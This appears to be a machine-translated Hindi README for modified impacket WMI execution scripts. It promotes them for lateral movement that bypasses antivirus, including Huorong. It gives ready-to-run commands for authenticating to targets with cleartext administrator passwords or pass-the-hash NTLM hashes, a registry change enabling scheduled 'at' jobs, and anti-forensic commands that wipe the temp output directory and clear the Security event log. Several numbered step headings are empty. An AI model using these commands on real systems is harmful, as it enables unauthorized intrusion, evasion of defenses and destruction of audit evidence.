
impacket wmiexec.py का संशोधित संस्करण, रजिस्ट्री से आउटपुट (डेटा, प्रतिक्रिया) प्राप्त करें, SMB कनेक्शन की आवश्यकता नहीं है, साथ ही WMIHACKER की तरह लैटरल मूवमेंट में एंटीवायरस-सॉफ़्टवेयर को बायपास करता है।
impacket wmiexec.py, wmipersist.py का संशोधित संस्करण। रजिस्ट्री से आउटपुट (डेटा, प्रतिक्रिया) प्राप्त करता है, SMB कनेक्शन की आवश्यकता नहीं है, लेकिन मैं खराब कोड में हूं :(
मूल wmiexec.py में, यह smb कनेक्शन (पोर्ट 445,139) से प्रतिक्रिया प्राप्त करता है। दुर्भाग्य से, कुछ एंटीवायरस सॉफ़्टवेयर इन पोर्ट्स को उच्च जोखिम के रूप में निगरानी कर रहे हैं।
इस मामले में, मैं smb कनेक्शन फ़ंक्शन को हटा देता हूं और कमांड निष्पादित करने के लिए अन्य विधियों का उपयोग करता हूं।
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration
Name: EnableAt
Type: REG_DWORD
Value: 1
wmipersist-wip.py (अत्यधिक अनुशंसित, !!!केवल impacket v0.9.24 पर काम करता है!!!): WMIHACKER का एक Python संस्करण, जिसमें से मैंने vbs टेम्पलेट लिया। हमलावर इसका उपयोग एंटीवायरस-सॉफ़्टवेयर चल रहे होने पर सुरक्षित रूप से पार्श्व आंदोलन करने के लिए कर सकता है।
wmiexec-regOut.py: बस एक सरल Win32_Process.create विधि उदाहरण।
चरण 1:
चरण 2:
चरण 3:
चरण 4:
चरण 5:
चरण 1:
चरण 2:
चरण 3:
सामान्यतः, आपको बस आधिकारिक impacket स्थापित करने की आवश्यकता है।
स्पष्ट पाठ पासवर्ड के साथ
python3 wmiexec-reg.py administrator:[email protected] 'whoami'

NTLM हैश के साथ
python3 wmiexec-reg.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'

स्पष्ट पाठ पासवर्ड के साथ (आउटपुट के बिना)
python3 wmipersist-wip.py administrator:[email protected] 'command'

NTLM हैश के साथ
python3 wmipersist-wip.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'
कमांड चलाने के बाद आउटपुट के साथ अस्थायी निर्देशिका को साफ करना न भूलें।
कमांड: del /q /f /s C:\windows\temp\*

कमांड में डबल कोट्स शामिल हैं।
एकल कोट्स के अंदर डबल कोट्स बनाएं wevtutil cl '"security"'


आउटपुट के साथ
python3 wmipersist-wip.py administrator:[email protected] "whoami /priv" -with-output
python3 wmipersist-wip.py [email protected] "whoami /priv" -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 -with-output

Huorong एंटीवायरस-सॉफ़्टवेयर के अंतर्गत (WMIHACKER VBS टेम्पलेट का उपयोग करके!!!)
